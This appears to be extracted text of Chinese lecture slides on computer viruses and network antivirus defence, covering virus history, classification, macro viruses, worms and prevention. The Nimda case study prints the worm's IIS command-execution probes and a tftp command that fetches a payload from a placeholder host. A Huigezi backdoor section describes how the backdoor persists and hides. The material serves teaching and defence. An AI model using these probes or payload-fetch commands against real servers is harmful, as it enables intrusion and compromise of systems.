chapter3網絡防病毒

1、第三章第三章 網絡防病毒網絡防病毒深職院 計算機網絡技術專業(yè)池瑞楠本章主要內容Key Questions 計算機病毒的定義 病毒發(fā)展史 計算機病毒的特點 病毒分類 計算機病毒的發(fā)展趨勢 病毒實例 病毒的防護網絡安全防護體系構架網絡安全防護體系構架網絡安全評估安全防護網絡安全服務系統(tǒng)漏洞掃描網絡管理評估病毒防護體系網絡監(jiān)控數(shù)據(jù)保密網絡訪問控制應急服務體系安全技術培訓數(shù)據(jù)恢復一、計算機病毒的定義 1994年2月18日，我國正式頒布實施了中華人民共和國計算機信息系統(tǒng)安全保護條例，在條例第二十八條中明確指出：“計算機病毒，指編制或者在計算機程序中插入的破壞計算機功能或者破壞數(shù)據(jù)破壞計算機功能或者破壞數(shù)

2、據(jù)，影響計算機使用并且能夠自我復制能夠自我復制 的一組計算機一組計算機指令或者程序代碼指令或者程序代碼 ”。 病毒：Virus二、計算機病毒的發(fā)展史 1、計算機病毒的產生的思想基礎和病毒發(fā)展簡介 2、實驗室中產生病毒的祖先（磁芯大戰(zhàn)） 3、計算機病毒的出現(xiàn)（1983年） 4、我國計算機病毒的出現(xiàn) （1989年）病毒的產生原因n（1）編制人員出于一種炫耀和顯示自己能力的目的n（2）某些軟件作者出于版權保護的目的而編制 n（3）出于某種報復目的或惡作劇而編寫病毒 n（4）出于政治、戰(zhàn)爭的需要計算機病毒的發(fā)展歷程 1. DOS引導階段 2. DOS可執(zhí)行階段 3. 伴隨階段 4. 多形階段 5. 生

3、成器、變體機階段 6. 網絡、蠕蟲階段 7. 視窗階段 8. 宏病毒階段 9. 郵件病毒階段 10. 手持移動設備病毒階段 時代劃分時間總結第一代：傳統(tǒng)病毒1986-1989DOS引導階段DOS可執(zhí)行階段第二代：混合病毒(超級病毒)1989-1991伴隨、批次型階段第三代：多態(tài)性病毒1992-1995幽靈、多形階段生成器、變體機階段第四代：90年代中后宏病毒階段網絡、蠕蟲階段典型的計算機病毒事件時間名稱事件1986Brain 第一個病毒（軟盤引導）1987黑色星期五病毒第一大規(guī)模爆發(fā)1988.11.2蠕蟲病毒 第一個蠕蟲計算機病毒 1990.1“4096”發(fā)現(xiàn)首例隱蔽型病毒，破壞數(shù)據(jù)1991

4、病毒攻擊應用于戰(zhàn)爭 1991米開朗基羅第一個格式化硬盤的開機型病毒1992VCL- Virus Creation Laboratory病毒生產工具在美國傳播時間名稱事件1992年9月首例Windows病毒1995FAT病毒、幽靈、變形金剛多態(tài)性（基于）windows）1997宏病毒 傳播方式增加（郵件等）1999CIH發(fā)現(xiàn)破壞計算機硬件病毒1999 Mellisahappy99郵件病毒2000紅色代碼黑客型病毒2001Nimda集中了所有蠕蟲傳播途徑2002SQLSPIDA.B第一個攻擊SQL服務器2003SQL_slammer利用SQL server數(shù)據(jù)庫的漏洞2003.8.11沖擊波集中了

5、所有蠕蟲傳播途徑2006年十大病毒 2006年出現(xiàn)的新病毒數(shù)量急劇增加，達到234211個，幾乎等于以往所有病毒數(shù)量的總和。 這些新病毒，90%以上帶有明顯的利益特征，有竊取個人資料、各種賬號密碼等行為。其中，竊取用戶賬號密碼等個人虛擬財產信息的病毒共167387個，占到總病毒數(shù)量的71.47%。這一年，中國還出現(xiàn)了首個勒索病毒“進程殺手變種”。2006年十大病毒序序號號病毒中文名累計感染計算機 類型類型感染系統(tǒng)感染系統(tǒng)1“熊貓燒香” 蠕蟲Win2000/XP2威金蠕蟲 446450蠕蟲Win9X/2000/XP/NT/Me/20033傳奇竊賊 739169 木馬Win9X/2000/XP/N

6、T/Me/20034敲詐者 木馬Win9X/2000/XP/NT/Me/20035QQ盜號木馬 615901 木馬Win9X/2000/XP/NT/Me/20036齷齪蟲 20351 蠕蟲Win9X/2000/XP/NT/Me7灰鴿子后門 897592 木馬Win9X/2000/XP/NT/Me8工行釣魚木馬 42838木馬Windows 2000、Windows XP9征途木馬變種木馬Win9X/2000/XP/NT/Me10調用門Rootkit Win3X/9X/2000/XP/NT/Me/2003近年新增病毒數(shù)量對比2007年各類病毒/木馬比例2007年十大病毒/木馬數(shù)據(jù)來源：金山軟件發(fā)

7、布的數(shù)據(jù)來源：金山軟件發(fā)布的2007年度中國電腦病毒疫情及互聯(lián)網安全年度中國電腦病毒疫情及互聯(lián)網安全報告報告（2008/1/17）2008年上半年病毒數(shù)量2008年度上半年十大病毒排行 FROM：江民科技 2008年上半年病毒種類分析計算機病毒的危害 1、計算機病毒造成巨大的社會經濟損失 2、影響政府職能部門正常工作的開展 3、計算機病毒被賦予越來越多的政治意義 4、利用計算機病毒犯罪現(xiàn)象越來越嚴重病毒帶來的威脅三、計算機病毒的特征 傳染性 破壞性 潛伏性和可觸發(fā)性 非授權性 隱藏性 不可預見性病毒名：Backdoor/Huigezi.2005（灰鴿子2005） 1.病毒運行后，將創(chuàng)建下列文件

8、(安全模式下查看)： %WinDir%IExplorer.exe，病毒程序 %WinDir%IExplorer.dll, 病毒程序 %WinDir%IExplorer_Hook.dll, 病毒程序 2.通過修改如下注冊表項，將病毒自身添加為服務 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesPower supply management 3.將IExplorer_Hook.dll注入到系統(tǒng)每個進程中，通過hook系統(tǒng)函數(shù)來達到隱藏自身的目的。 (1)隱藏病毒自身進程，通過任務管理器無法查找到病毒進程。 (2)隱藏病毒自身文件，正常模式下查看不

9、到病毒文件。 (3)隱藏自身添加的服務，使自己從服務列表中消失。 四、計算機病毒有哪些種類？依據(jù)不同的分類標準，計算機病毒可以做不同的歸類。常見的分類標準有：1. 根據(jù)病毒依附的操作系統(tǒng)2. 根據(jù)病毒的傳播媒介3. 根據(jù)病毒的傳染途徑病毒攻擊的操作系統(tǒng) Microsoft DOS Microsoft Windows 95/98/ME Microsoft Windows NT/2000/XP Unix(Linux) 其他操作系統(tǒng)病毒攻擊的操作系統(tǒng)圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)DOSDOS43%43%UnixUnix3%3%OtherOther1%1%WindowWindows s53%53%D

10、OSDOSWindowsWindowsUnixUnixOtherOther病毒的傳播媒介存儲介質網絡1. 郵件(SoBig)2. 網頁(RedLof)3. 局域網(Funlove)4. 遠程攻擊(Blaster)5. 網絡下載病毒網絡傳播方式圖例(數(shù)據(jù)來源于瑞星病毒樣本庫)郵件郵件47%47%局域網局域網9%9%遠程攻遠程攻擊擊4%4%網頁網頁40%郵件郵件網頁網頁局域網局域網遠程攻擊遠程攻擊病毒的傳播和感染對象感染引導區(qū)感染文件可執(zhí)行文件OFFICE宏網頁腳本（ Java小程序和ActiveX控件）網絡蠕蟲網絡木馬破壞程序其他惡意程序病毒演示病毒演示病毒演示CIH病毒病毒病毒演示彩帶病毒病毒

11、演示女鬼病毒病毒演示千年老妖病毒演示圣誕節(jié)病毒病毒演示白雪公主巨大的黑白螺旋占據(jù)了屏幕位置，使計算機使用者無法進行任何操作！紅色代碼 1() 病毒發(fā)作現(xiàn)象病毒發(fā)作現(xiàn)象引導型病毒 文件型病毒 文件型病毒的特點是附著于正常程序文件，成為程序文件的一個外殼或部件。 文件型病毒主要以感染文件擴展名為.com、.exe和.bat等可執(zhí)行程序為主。 大多數(shù)的文件型病毒都會把它們自己的代碼復制到其宿主文件的開頭或結尾處。 計算機病毒引起是異常情況 計算機系統(tǒng)運行速度明顯降低 系統(tǒng)容易死機 文件改變、破壞 磁盤空間迅速減少 內存不足 系統(tǒng)異常頻繁重

12、啟動 頻繁產生錯誤信息常見DOS病毒分析1引導記錄病毒 （1）引導型病毒的傳播、破壞過程 （2）引導型病毒實例：小球病毒 2文件型病毒（1）文件型病毒的類型 （2）文件型病毒的感染方式 （3）.COM文件的感染 （4）.EXE文件的感染 （5）.SYS文件的感染 宏病毒的行為和特征 宏病毒是一種新形態(tài)的計算機病毒，也是一種跨平臺式計算機病毒?？梢栽赪indows、Windows 95/98/NT、OS/2、Macintosh 等操作系統(tǒng)上執(zhí)行病毒行為。 宏病毒的主要特征如下： 1）宏病毒會感染.DOC文檔和.DOT模板文件。 2）宏病毒的傳染通常是Word在打開一個帶宏病毒的文檔或模板時，激活

13、宏病毒。 3）多數(shù)宏病毒包含AutoOpen、AutoClose、AutoNew和AutoExit等自動宏，通過這些自動宏病毒取得文檔（模板）操作權。 4）宏病毒中總是含有對文檔讀寫操作的宏命令。5）宏病毒在.DOC文檔、.DOT模板中以BFF（Binary File Format）格式存放，這是一種加密壓縮格式，每個Word版本格式可能不兼容。6）宏病毒具有兼容性。 宏病毒的特點 1傳播極快 2制作、變種方便 3破壞可能性極大宏病毒的防治和清除方法Word宏病毒，是近年來被人們談論得最多的一種計算機病毒。與那些用復雜的計算機編程語言編制的病毒相比，宏病毒的防治要容易得多！在了解了Word宏病

14、毒的編制、發(fā)作過程之后，即使是普通的計算機用戶，不借助任何殺毒軟件，就可以較好地對其進行防冶。 1. 查看“可疑”的宏 2按使用習慣編制宏 3防備Autoxxxx宏 4小心使用外來的Word文檔 5使用選項“Prompt to Save Normal Template” （工具-選項-保存）6查看宏代碼并刪除 7. 將文檔存儲為RTF格式 8設置Normal.dot的只讀屬性 9 Normal.dot的密碼保護 10使用OFFICE 的報警設置 網絡化病毒的特點 網絡化：傳播速度快、爆發(fā)速度快、面廣 隱蔽化：具有欺騙性（加密） 多平臺、多種語言 新方式：與黑客、特洛伊木馬相結合 多途徑： 攻擊

15、反病毒軟件 變化快（變種） 清除難度大 破壞性強 蠕蟲病毒 通過網絡傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征，如不利用文件寄生（有的只存在于內存中）,對網絡造成拒絕服務，以及和黑客技術相結合等等。蠕蟲病毒與其他病毒的區(qū)別普通病毒蠕蟲病毒存在形式 寄存文件獨立程序傳染機制宿主程序運行主動攻擊傳染目標本地文件網絡計算機蠕蟲病毒的特點 破壞性強 傳染方式多 一種是針對企業(yè)的局域網，主要通過系統(tǒng)漏洞；另外一種是針對個人用戶的, 主要通過電子郵件,惡意網頁形式迅速傳播的蠕蟲病毒。 傳播速度快 清除難度大實例：2003蠕蟲王 病毒實例Nimda及解決方案感

16、染 Win 95/98/NT/2000 系統(tǒng)1.通過email 在internet臨時文件夾中讀取所有htm， h t m l 文 件 并 從 中 提 取 e m a i l 地 址 ，從信箱讀取email并從中提取SMTP服務器，然后發(fā)送readme.eml。NimdaNimda-2.利用 IIS、IE 的安全漏洞 CodeRedII會在IIS的幾個可執(zhí)行目錄下放置root.exeNimda首先在udp/69上啟動一個tftp服務器然后會作以下掃描： GET /scripts/root.exe?/c+dir HTTP/1.0GET /MSADC/root.exe?/c+dir HTTP/1.

17、0GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0一 旦 發(fā) 現(xiàn) 有 弱 點 的 系 統(tǒng) 就 使 用 類 似 下 面 的 命 令GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx G E T A d m i n . d l l H T T P / 1 . 0把文件傳到主機上去，然后再GET /scripts/Admin.dll HTTP/1.0NimdaNimda- - 3.通過WWW服務 在所有文件名中包含defau

18、lt/index/main/readme并且擴展名為htm/html/asp的文件所在目錄中創(chuàng)建readme.eml，并在文件末加上下面這一行window.open(readme.eml, null, resizable=no,top=6000,left=6000)也就是說如果一臺web服務器被感染了，那么大部分訪問過此服務器的機器都會被感染。 NimdaNimda- - 4.通過局域網的共享 Nimda會搜索本地的共享目錄中包含doc文件的目錄，一但找到，就會把自身復制到目錄中命名為riched20.dll 病毒實例Nimda及解決方案首先對網絡中的工作站進行全面清查對已感染的工作站進行徹底

19、的殺毒，然后對已染毒的服務器殺毒以保證整個網絡系統(tǒng)是干凈的；對網絡中的服務器及工作站進行軟件升級等一系列后續(xù)工程，杜絕再次染毒打微軟IIS、IE的補丁最后著重對服務器進行本地安全策略的設置，做好防范工作，做到即使服務器再次中毒也不能影響整個服務器的正常工作及整個網絡系統(tǒng)的正常運轉。反病毒技術簡述計算機病毒診斷技術計算機病毒診斷技術 1特征代碼法 2校驗和法 3行為監(jiān)測法 4軟件模擬法五、病毒的預防措施 安裝防病毒軟件 定期升級防病毒軟件 不隨便打開不明來源 的郵件附件 盡量減少其他人使用你的計算機 及時打系統(tǒng)補丁 從外面獲取數(shù)據(jù)先檢察 建立系統(tǒng)恢復盤 定期備份文件 綜合各種防病毒技術STOP!服務器端防毒客戶端防毒防毒防毒集中管理器集中管理器STOP!STOP!Mail ServerSTOP!全方位的網絡病毒防護體系STOP!Meb Server File ServerSTOP!網絡病毒的特點及傳播方式網絡病毒的特點 網絡病毒的傳播方式 v 全網統(tǒng)一配置防毒策略。v 全網統(tǒng)一查殺病毒,沒有死角。v 全網統(tǒng)一升級版本統(tǒng)一。v 全網防毒狀況一目了然。v 跨平臺技術，全方位防病毒v 全網防毒工作輕松簡單：自動安裝、自動維護、自動更新單機版與網絡版的區(qū)別單機防毒網絡防毒網絡防毒選擇防毒軟件的標準 “高偵測率